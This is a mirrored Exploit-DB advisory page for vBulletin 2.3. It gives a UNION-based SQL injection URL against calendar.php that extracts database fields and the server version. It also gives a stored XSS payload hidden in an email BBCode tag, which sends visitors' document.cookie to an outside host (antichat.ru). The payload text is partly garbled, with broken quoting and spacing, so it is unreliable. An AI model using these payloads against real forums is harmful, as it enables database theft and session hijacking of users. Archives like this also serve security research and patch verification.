bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/11396.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

26 lines
No EOL
1.2 KiB
Text
Raw Blame History

# Title: vbulletin Vulnerability versions 2.3 .* - SQL injection.
# Author: Discovered by ROOT_EGY
# Version: vBulletin Version 2.3
===========================================================
www.sec-war.com
===========================================================
Vulnerability versions 2.3 .* - SQL injection in the validation of input data in 'calendar.php'. Sends SQL requests to the server.
For example:
www.server.som/forumpath/calendar.php?s=&action=edit&eventid=14 union (SELECT allowsmilies, public, userid, '0000-0-0 ', version (), userid FROM calendar_events WHERE eventid = 14) order by eventdate
Vulnerability to Version 2 .*.* - is introducing XSS script tag e-mail
[E * MAIL] aaa@aaa.aa » 's =' [/ E * MAIL] 'sss =» i = new Image (); i.src =' http://antichat.ru/cgi-bin/s . jpg? '+ document.cookie; this.sss = null »style = top: expression (eval (this.sss));
===========================================================
ROOT_EGY to connect: r0t@hotmail.es
===========================================================
Greetz TO : Alnjm33 - Mr.xXx - EgY-Sn!per - red virus - ShOot3r - And All My Friends.
===========================================================
Reference in a new issue View git blame Copy permalink